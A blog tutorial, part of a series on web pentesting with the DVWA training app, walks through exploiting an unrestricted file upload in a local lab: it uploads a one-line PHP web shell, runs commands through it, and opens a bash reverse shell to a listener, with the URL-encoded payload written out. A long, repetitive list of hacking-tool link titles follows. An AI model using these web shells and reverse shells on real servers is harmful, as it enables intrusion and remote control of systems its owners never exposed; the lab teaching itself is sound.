sexta-feira, 19 de janeiro de 2024

Learning Web Pentesting With DVWA Part 5: Using File Upload To Get Shell

In today's article we will go through the File Upload vulnerability of DVWA. File Upload vulnerability is a common vulnerability in which a web app doesn't restrict the type of files that can be uploaded to a server. The result of which is that a potential adversary uploads a malicious file to the server and finds his/her way to gain access to the server or perform other malicious activities. The consequences of Unrestricted File Upload are put out by OWASP as: "The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement. It depends on what the application does with the uploaded file and especially where it is stored."
For successful vulnerability exploitation, we need two things:
1. An unrestricted file upload functionality.
2. Access to the uploaded file to execute the malicious code.
To perform this type of attack on DVWA click on File Upload navigation link, you'll be presented with a file upload form like this:
Lets upload a simple text file to see what happens. I'll create a simple text file with the following command:
echo TESTUPLOAD > test.txt 
and now upload it.
The server gives a response back that our file was uploaded successfully and it also gives us the path where our file was stored on the server. Now lets try to access our uploaded file on the server, we go to the address provided by the server which is something like this:
http://localhost:9000/hackable/uploads/test.txt 
and we see the text we had written to the file. Lets upload a php file now since the server is using php. We will upload a simple php file containing phpinfo() function. The contents of the file should look something like this.
<?php phpinfo(); ?> 
Save the above code in a file called info.php (you can use any name) and upload it. Now naviagte to the provided URL:
http://localhost:9000/hackable/uploads/info.php 
and you should see a phpinfo page like this:
phpinfo page contains a lot of information about the web application, but what we are interested in right now in the page is the disable_functions column which gives us info about the disabled functions. We cannot use disabled functions in our php code. The function that we are interested in using is the system() function of php and luckily it is not present in the disable_functions column. So lets go ahead and write a simple php web shell:
<?php system($_GET["cmd"]); ?> 
save the above code in a file shell.php and upload it. Visit the uploaded file and you see nothing. Our simple php shell is looking for a "cmd" GET parameter which it passes then to the system() function which executes it. Lets check the user using the whoami command as follows:
http://localhost:9000/hackable/uploads/shell.php?cmd=whoami 
we see a response from the server giving us the user under which the web application is running.
We can use other bash commands such as ls to list the directories. Lets try to get a reverse shell now, we can use our existing webshell to get a reverse shell or we can upload a php reverse shell. Since we already have webshell at our disposal lets try this method first.
Lets get a one liner bash reverseshell from Pentest Monkey Reverse Shell Cheat Sheet and modify it to suit our setup, but we first need to know our ip address. Enter following command in a terminal to get your ip address:
ifconfig docker0 
the above command provides us information about our virtual docker0 network interface. After getting the ip information we will modify the bash one liner as:
bash -c 'bash -i >& /dev/tcp/172.17.0.1/9999 0>&1' 
here 172.17.0.1 is my docker0 interface ip and 9999 is the port on which I'll be listening for a reverse shell. Before entering it in our URL we need to urlencode it since it has some special characters in it. After urlencoding our reverse shell one liner online, it should look like this:
bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.17.0.1%2F9999%200%3E%261%27 
Now start a listener on host with this command:
nc -lvnp 9999 
and then enter the url encoded reverse shell in the cmd parameter of the url like this:
http://localhost:9000/hackable/uploads/shell.php?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.17.0.1%2F9999%200%3E%261%27 
looking back at the listener we have a reverse shell.
Now lets get a reverse shell by uploading a php reverse shell. We will use pentest monkey php reverse shell which you can get here. Edit the ip and port values of the php reverse shell to 172.17.0.1 and 9999. Setup our netcat listener like this:
nc -lvnp 9999 
and upload the reverse shell to the server and access it to execute our reverse shell.
That's it for today have fun.

References:

  1. Unrestricted File Upload: https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload
  2. Reverse Shell Cheat Sheet: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
  3. Php Reverse Shell (Pentest Monkey): https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

Related news


  1. Hacking App
  2. Hacker Tools
  3. Pentest Tools Windows
  4. Hack Tools Online
  5. Best Hacking Tools 2019
  6. Pentest Tools Tcp Port Scanner
  7. Hack And Tools
  8. Best Hacking Tools 2019
  9. Hacker Tools For Mac
  10. What Is Hacking Tools
  11. Hack Tools Download
  12. Underground Hacker Sites
  13. Hacker Tools Software
  14. Hacking Tools For Pc
  15. Hack Tools Online
  16. Pentest Recon Tools
  17. Pentest Tools Find Subdomains
  18. Hacker Tools Github
  19. Pentest Tools Linux
  20. Hack Tools For Pc
  21. Hacker Tools Hardware
  22. Nsa Hacker Tools
  23. Hacker Search Tools
  24. Pentest Tools For Windows
  25. Hacker Tools Windows
  26. Pentest Tools Windows
  27. Hacker Tools 2020
  28. Pentest Tools Port Scanner
  29. Top Pentest Tools
  30. Hack Tools For Mac
  31. Hack Tools
  32. Hacker Tools 2020
  33. Hack Rom Tools
  34. Pentest Tools Find Subdomains
  35. Hacker Tools 2020
  36. Hacking Tools Usb
  37. Hacker
  38. New Hacker Tools
  39. Hacking Tools For Kali Linux
  40. Pentest Tools Port Scanner
  41. Hacker Tools Linux
  42. Pentest Tools Website Vulnerability
  43. Hacker Tools 2020
  44. Underground Hacker Sites
  45. Pentest Tools Kali Linux
  46. Hacking Tools For Games
  47. Pentest Tools Open Source
  48. Pentest Reporting Tools
  49. Hacker Tools Mac
  50. Hacker Tools Free Download
  51. Pentest Tools Free
  52. Hack And Tools
  53. Hacking Tools For Kali Linux
  54. What Is Hacking Tools
  55. Pentest Recon Tools
  56. Hacking Tools 2020
  57. Pentest Tools Linux
  58. Hacking Tools Free Download
  59. Nsa Hacker Tools
  60. Pentest Tools Framework
  61. Best Hacking Tools 2020
  62. Hacking Tools For Games
  63. Hacking Tools For Windows 7
  64. Pentest Tools Online
  65. Hack And Tools
  66. Hacker Tools Software
  67. Pentest Tools Nmap
  68. Hacking Tools Kit
  69. Hacker Security Tools
  70. Hack Tools For Mac
  71. Install Pentest Tools Ubuntu
  72. Hacker Tools Software
  73. Hak5 Tools
  74. What Are Hacking Tools
  75. Pentest Tools Website
  76. Hack Apps
  77. Hacker Tools
  78. Hacking Tools Windows 10
  79. Hack And Tools
  80. Hack Tools Download
  81. Hack Tools
  82. Hacking Tools Download
  83. Hacker Tools Windows
  84. Hacking Tools For Games
  85. Hacking Tools For Beginners
  86. Top Pentest Tools
  87. Pentest Automation Tools
  88. Usb Pentest Tools
  89. Pentest Tools List
  90. Pentest Tools For Mac
  91. Hacking Tools For Mac
  92. Tools Used For Hacking
  93. Android Hack Tools Github
  94. Hacker Tools Hardware
  95. Hack Tools Mac
  96. Pentest Tools Nmap
  97. Hacking Tools Hardware
  98. Beginner Hacker Tools
  99. Hacker Tools For Windows
  100. Hacker Tools Windows
  101. Pentest Tools Website
  102. Ethical Hacker Tools
  103. Hacker Tools Windows
  104. Hack Tools Github
  105. What Is Hacking Tools
  106. Hacking Tools Name
  107. Hacking Tools Software
  108. Nsa Hack Tools
  109. Hacking Tools
  110. Kik Hack Tools
  111. Bluetooth Hacking Tools Kali
  112. Pentest Tools Url Fuzzer
  113. Pentest Box Tools Download
  114. Hack Tools For Mac
  115. Pentest Tools Port Scanner
  116. Install Pentest Tools Ubuntu
  117. Hacks And Tools
  118. Pentest Tools Linux
  119. Hack Tools For Pc
  120. Black Hat Hacker Tools
  121. Pentest Tools Open Source
  122. Hacker Hardware Tools
  123. Hackers Toolbox
  124. New Hacker Tools
  125. Hacking Tools Pc
  126. Pentest Reporting Tools
  127. Pentest Tools Website
  128. Hacker Hardware Tools
  129. Black Hat Hacker Tools
  130. Termux Hacking Tools 2019
  131. Usb Pentest Tools
  132. Pentest Tools Open Source
  133. Pentest Tools Android
  134. Hacking Tools For Games
  135. Pentest Tools Download
  136. Termux Hacking Tools 2019
  137. Nsa Hack Tools Download
  138. Pentest Tools Website
  139. Usb Pentest Tools
  140. Hack Rom Tools
  141. Hack Tools For Ubuntu
  142. Pentest Tools Apk
  143. Hacker Tools Free Download

Nenhum comentário:

Postar um comentário